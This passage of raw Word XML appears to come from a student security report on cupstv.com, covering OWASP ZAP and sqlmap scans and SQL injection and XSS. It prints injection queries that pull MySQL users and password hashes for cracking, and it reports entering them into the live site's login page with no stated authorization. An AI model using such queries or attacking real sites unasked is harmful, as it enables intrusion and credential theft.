        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00820336">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000B668C">
        <w:t>The SQL map tool failed to connect to cupstv.com, during the connection process the connection was forcibly closed by cupstv.com. This then means there is some protection against SQL Injection.</w:t>
      </w:r>
      <w:r w:rsidR="00B31F6C">
        <w:t xml:space="preserve"> See </w:t>
      </w:r>
      <w:r w:rsidR="00F05BE8">
        <w:t>appendices</w:t>
      </w:r>
      <w:r w:rsidR="00B31F6C">
        <w:t xml:space="preserve"> e for the error that appeared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB1945" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="00DB63F1"/>
    <w:p w14:paraId="44F541DC" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRPr="00C24692" w:rsidRDefault="005C0E93" w:rsidP="00C24692">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc501124787"/>
      <w:r w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ZAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0FEC6DF1" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="005C0E93">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4261EE" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="005C0E93">
      <w:r>
        <w:t xml:space="preserve">The use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is to scan websites for vulnerabilities and to then attack them. For this scenario a standard scan was setup on </w:t>
      </w:r>
      <w:r w:rsidRPr="005C0E93">
        <w:t>http://cupstv.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the scan begun by finding as much information as possible on the target website. Once the scan was completed it then started an “active scan” which will also attack the website</w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project", "accessed" : { "date-parts" : [ [ "2017", "12", "8" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "OWASP Zed Attack Proxy Project - OWASP", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=3a69ae42-3a8e-3110-a3fc-0599fe3f5ca4" ] } ], "mendeley" : { "formattedCitation" : "[8]", "plainTextFormattedCitation" : "[8]", "previouslyFormattedCitation" : "[8]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006476AE">
        <w:t xml:space="preserve"> The overview for the active scan and scan can be seen within appendices f</w:t>
      </w:r>
      <w:r w:rsidR="008B2BB4">
        <w:t>. The choices of attacks can also be seen in appendices g, some were de-selected because they were not necessary. These tests focus on the most dangerous and common attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B3EE2F" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="005C0E93"/>
    <w:p w14:paraId="26C54B54" w14:textId="77777777" w:rsidR="005C0E93" w:rsidRDefault="005C0E93" w:rsidP="005C0E93">
      <w:r>
        <w:t xml:space="preserve">The scan results found that </w:t>
      </w:r>
      <w:r w:rsidR="00FF5E87">
        <w:t xml:space="preserve">there are multiple flaws with the websites, the scan found two high risk flaws and five low risk flaws. The first high risk flaw that was discovered showed that SQL injection may be possible, as shown in appendices </w:t>
      </w:r>
      <w:r w:rsidR="00A35A0D">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00FF5E87">
        <w:t xml:space="preserve"> the scan picked up some flaws that could be exploited using SQL Injection. The second-high risk flaw that ZAP found was Remote OS Command Injection, this can be seen within appendices </w:t>
      </w:r>
      <w:r w:rsidR="00A35A0D">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00FF5E87">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7AF94" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="005C0E93"/>
    <w:p w14:paraId="4847A758" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00DB63F1" w:rsidRDefault="00017C4C" w:rsidP="005C0E93">
      <w:r>
        <w:t xml:space="preserve">The five low risk issues that were found although are unlikely to be exploited it is still possible for some, that is why only three will be discussed. The first low risk flaw was a cookie which was set with no http only flag, this shows that in some cases cookie stealing is possible. Please see appendices </w:t>
      </w:r>
      <w:r w:rsidR="00A35A0D">
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for evidence of the scan results but also the Java script </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">which high lights the flawed sections in green. The second low risk flaw that was found involved storing passwords, there is an auto complete attribute which is enabled within the HTML form element containing password type inputs. This then means that passwords can be stored in the browser and retrieved which can be extremely dangerous. </w:t>
      </w:r>
      <w:r w:rsidR="005B1BB0">
        <w:t xml:space="preserve">Once again see appendices </w:t>
      </w:r>
      <w:r w:rsidR="00A35A0D">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="005B1BB0">
        <w:t xml:space="preserve"> for the scan results and the areas of code which hold the flaw. The third and final low risk flaw to be discussed is a lack of XSS protection on multiple pages, this flaw effects over </w:t>
      </w:r>
      <w:r w:rsidR="00F05BE8">
        <w:t xml:space="preserve">3055 sections of cupstv.com. XSS protection is used to protect against such threats as cross site scripting, although it’s only a basic form of protection it can still aid with potential attacks. Please see appendices </w:t>
      </w:r>
      <w:r w:rsidR="00A35A0D">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00F05BE8">
        <w:t xml:space="preserve"> for the results of the scans. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBA811" w14:textId="77777777" w:rsidR="00CD001E" w:rsidRDefault="001B121C" w:rsidP="00B1698A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc501124788"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5. Attacks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0E9B90DC" w14:textId="77777777" w:rsidR="00B1698A" w:rsidRPr="00B1698A" w:rsidRDefault="00B1698A" w:rsidP="00B1698A"/>
    <w:p w14:paraId="011104FE" w14:textId="77777777" w:rsidR="00CD001E" w:rsidRPr="00C24692" w:rsidRDefault="00CD001E" w:rsidP="00C24692">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc501124789"/>
      <w:r w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1 SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="04F9392D" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="00CD001E" w:rsidP="00CD001E">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68132FF7" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="00B664F9" w:rsidP="00CD001E">
      <w:r>
        <w:t>The use of SQL Injection is extremely popular even though it has been around for many years. The idea of SQL injection is to run malicious SQL queries against a database server, this is typically done using the input of a website usually a login page. If the website has not been configured correctly it can leave itself exposed to specific SQL queries. Since cupstv.com has port 3306 open this would indicate it uses MySQL as it’s query language</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "DOI" : "10.7763/IJCCE.2013.V2.244", "abstract" : "\uf020 Abstract\u2014SQL injection is an attack technique that exploits a security vulnerability occurring in the database layer of an application and a service. This is most often found within web pages with dynamic content. This paper provides taxonomy on SQL injection prevention and detection approaches. Furthermore, for each type of vulnerability, we provide descriptions of how attacks of that type could take advantage of that vulnerability and perform attack. We also present and analysis some of existing detection and prevention techniques against SQL injection attacks. Finally, we compare different type of approaches and techniques and provide a list of their deployment requirements. Index Terms\u2014SQL injection attack, SQL queries, web application, DBMS, taxonomy, web application security.", "author" : [ { "dropping-particle" : "", "family" : "Pour", "given" : "Bahare Tajalli", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Sajjadi", "given" : "Sayyed Mohammad Sadegh", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "container-title" : "International Journal of Computer and Communication Engineering", "id" : "ITEM-1", "issue" : "5", "issued" : { "date-parts" : [ [ "2013" ] ] }, "title" : "Study of SQL Injection Attacks and Countermeasures", "type" : "article-journal", "volume" : "2" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=60247bca-0768-31b3-bc3d-1c0e7d9de595" ] } ], "mendeley" : { "formattedCitation" : "[9]", "plainTextFormattedCitation" : "[9]", "previouslyFormattedCitation" : "[9]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4323FA0B" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="00B664F9" w:rsidP="00CD001E"/>
    <w:p w14:paraId="563C5462" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="00B664F9" w:rsidP="00CD001E">
      <w:r>
        <w:t>Since there is no information regarding this webpages backbone this would be considered a blind SQL injection attack, this would involve inputting SQL queries to slowly gather information regarding the database. After information is gathered the ability to pull users and password from the database is possible</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1593277598", "abstract" : "Includes index. \"Teaches how to use C#'s set of core libraries to automate tasks like performing vulnerability scans, malware analysis, and incident response. Teaches how to write practical security tools that will run on Mac, Linux, and mobile devices\"-- C# crash course -- Fuzzing and exploiting XSS and SQL injection -- Fuzzing SOAP endpoints -- Writing connect-back, binding, and metasploit payloads -- Automating nessus -- Automating nexpose -- Automating OpenVAS -- Automating Cuckoo Sandbox -- Automating sqlmap -- Automating ClamAV -- Automating Metasploit -- Automating Arachni -- Decompiling and reversing managed assemblies -- Reading offline registry hives.", "author" : [ { "dropping-particle" : "", "family" : "Perry", "given" : "Brandon", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "number-of-pages" : "275", "title" : "Gray hat C# : a hacker's guide to creating and automating security tools", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=313256fa-7862-3e19-a779-bce0178bac53" ] } ], "mendeley" : { "formattedCitation" : "[10]", "plainTextFormattedCitation" : "[10]", "previouslyFormattedCitation" : "[10]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0596529643", "abstract" : "This Short Cut introduces you to how SQL injection vulnerabilities work, what makes applications vulnerable, and how to protect them. It helps you find your vulnerabilities with analysis and testing tools and describes simple approaches for fixing them in the most popular web-programming languages. This Short Cut also helps you protect your live applications by describing how to monitor for and block attacks before your data is stolen. Hacking is an increasingly criminal enterprise, and web applications are an attractive path to identity theft. Why Should You Care?; Data at Risk; How Applications Work; How Web Applications Work; How SQL Queries Work; How Web Applications Receive Data; Attacks; Motivations; What Makes Attacks Possible?; How Attacks Work; Types of Attacks; Defenses; Defense #1: Code Securely; Defense #2: Monitor for Attacks; Defense #3: Block Attacks; Defense #4: Probe for Vulnerabilities; Conclusion and Bottom Line.", "author" : [ { "dropping-particle" : "", "family" : "Nystrom", "given" : "Marty.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2007" ] ] }, "publisher" : "O'Reilly", "title" : "SQL injection defenses", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=c0f2af3c-8632-3ff3-b4cc-83177f877d18" ] } ], "mendeley" : { "formattedCitation" : "[11]", "plainTextFormattedCitation" : "[11]", "previouslyFormattedCitation" : "[11]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E0C04" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="00B664F9" w:rsidP="00CD001E"/>
    <w:p w14:paraId="759FDC2D" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="00B664F9" w:rsidP="00CD001E">
      <w:r>
        <w:t>For example, if the website was not configured correctly then running a query such as</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t xml:space="preserve">SELECT user FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t>mysql.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t xml:space="preserve">; — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A3D97">
        <w:t xml:space="preserve"> would list all users, following this with </w:t>
      </w:r>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t xml:space="preserve">SELECT host, user, password FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t>mysql.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t xml:space="preserve">; — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A3D97" w:rsidRPr="008A3D97">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A3D97">
        <w:t xml:space="preserve"> would then provide the password hashes. Once the hashes are available all that would be needed is to crack the passwords using John the Ripper for example </w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0596529643", "abstract" : "This Short Cut introduces you to how SQL injection vulnerabilities work, what makes applications vulnerable, and how to protect them. It helps you find your vulnerabilities with analysis and testing tools and describes simple approaches for fixing them in the most popular web-programming languages. This Short Cut also helps you protect your live applications by describing how to monitor for and block attacks before your data is stolen. Hacking is an increasingly criminal enterprise, and web applications are an attractive path to identity theft. Why Should You Care?; Data at Risk; How Applications Work; How Web Applications Work; How SQL Queries Work; How Web Applications Receive Data; Attacks; Motivations; What Makes Attacks Possible?; How Attacks Work; Types of Attacks; Defenses; Defense #1: Code Securely; Defense #2: Monitor for Attacks; Defense #3: Block Attacks; Defense #4: Probe for Vulnerabilities; Conclusion and Bottom Line.", "author" : [ { "dropping-particle" : "", "family" : "Nystrom", "given" : "Marty.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2007" ] ] }, "publisher" : "O'Reilly", "title" : "SQL injection defenses", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=c0f2af3c-8632-3ff3-b4cc-83177f877d18" ] } ], "mendeley" : { "formattedCitation" : "[11]", "plainTextFormattedCitation" : "[11]", "previouslyFormattedCitation" : "[11]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet", "accessed" : { "date-parts" : [ [ "2017", "12", "8" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "MySQL SQL Injection Cheat Sheet | pentestmonkey", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=20dd6123-f21f-3550-9d9c-cc60a2e39957" ] } ], "mendeley" : { "formattedCitation" : "[12]", "plainTextFormattedCitation" : "[12]", "previouslyFormattedCitation" : "[12]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008A3D97">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CEABAD" w14:textId="77777777" w:rsidR="009D4CB1" w:rsidRDefault="009D4CB1" w:rsidP="00CD001E"/>
    <w:p w14:paraId="639CD31A" w14:textId="77777777" w:rsidR="009D4CB1" w:rsidRDefault="009D4CB1" w:rsidP="00CD001E">
      <w:r>
        <w:t xml:space="preserve">Although there is no intention of </w:t>
      </w:r>
      <w:r w:rsidR="00782D79">
        <w:t>beginning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a full-on attack against cupstv.com there was some testing done using these attacks, in the case of SQL injection, the commands mentioned earlier were planted within the cupstv.com login page. The results ended with the IP of the attacker getting blocked, this can be seen </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51864">
        <w:t xml:space="preserve">within appendices </w:t>
      </w:r>
      <w:r w:rsidR="00667DEF" w:rsidRPr="00C51864">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51864">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>This failed attempt was most likely due to them having some form of protection in place against SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B82AF" w14:textId="77777777" w:rsidR="00CC1D23" w:rsidRDefault="00CC1D23" w:rsidP="00CD001E"/>
    <w:p w14:paraId="5BB13F2D" w14:textId="77777777" w:rsidR="009D4CB1" w:rsidRPr="00C24692" w:rsidRDefault="009D4CB1" w:rsidP="00C24692">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc501124790"/>
      <w:r w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2 Cross Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00F14567" w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="39D185C1" w14:textId="77777777" w:rsidR="009D4CB1" w:rsidRDefault="009D4CB1" w:rsidP="009D4CB1">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3604FFE0" w14:textId="77777777" w:rsidR="007D169E" w:rsidRDefault="009D4CB1" w:rsidP="00B00BAF">
      <w:r>
        <w:t>Cross site scripting just like SQL injection is one of the more popular choices for launching attacks against any website.</w:t>
      </w:r>
      <w:r w:rsidR="00F14567">
        <w:t xml:space="preserve"> XSS enables an attacker to inject client-side scripts into a website which is then viewed by users. This is </w:t>
      </w:r>
      <w:r w:rsidR="003C1AA1">
        <w:t xml:space="preserve">typically broken down into two types of cross site scripting </w:t>
      </w:r>
      <w:r w:rsidR="00B00BAF">
        <w:t>reflected or non-</w:t>
      </w:r>
      <w:r w:rsidR="007D169E">
        <w:t>persistent</w:t>
      </w:r>
      <w:r w:rsidR="00B00BAF">
        <w:t xml:space="preserve"> cross site scripting is the more basic version. The vulnerabilities appear when data is provided by a web client which is typically a HTTP query parameter. This will then be used by server-side scripts to analyse and show a page of results for that user without ensuring the request is not malicious.</w:t>
      </w:r>
      <w:r w:rsidR="007D169E">
        <w:t xml:space="preserve"> A reflected attack is usually done through email or a website. This is done using an innocent looking URL which points to a trusted website, but it would then contact the XSS vector. If the trusted site in question is </w:t>
      </w:r>
      <w:r w:rsidR="007D169E">
        <w:lastRenderedPageBreak/>
        <w:t>vulnerable to the vector, then once the link is pressed the victim’s browser would then execute the injected script</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0080553400", "abstract" : "Includes index. Cross Site Scripting Attacks starts by defining the terms and laying out the ground work. It assumes that the reader is familiar with basic web programming (HTML) and JavaScript. First it discusses the concepts, methodology, and technology that makes XSS a valid concern. It then moves into the various types of XSS attacks, how they are implemented, used, and abused. After XSS is thoroughly explored, the next part provides examples of XSS malware and demonstrates real cases where XSS is a dangerous risk that exposes internet users to remote access, sensitive data theft, and monetary losses. Fin. Front Cover; XSS Attacks: Cross Site Scripting Exploits and Defense; Copyright Page; Contents; Chapter 1. Cross-site Scripting Fundamentals; Chapter 2. The XSS Discovery Toolkit; Chapter 3. XSS Theory; Chapter 4. XSS Attack Methods; Chapter 5. Advanced XSS Attack Vectors; Chapter 6. XSS Exploited; Chapter 7. Exploit Frameworks; Chapter 8. XSS Worms; Chapter 9. Preventing XSS Attacks; Appendix A The Owned List; Index.", "author" : [ { "dropping-particle" : "", "family" : "Grossman", "given" : "Jeremiah.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2007" ] ] }, "number-of-pages" : "448", "publisher" : "Syngress", "title" : "XSS attacks : cross-site scripting exploits and defense", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=5fac39f2-439b-3c7c-be49-3c4567cba91f" ] } ], "mendeley" : { "formattedCitation" : "[13]", "plainTextFormattedCitation" : "[13]", "previouslyFormattedCitation" : "[13]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
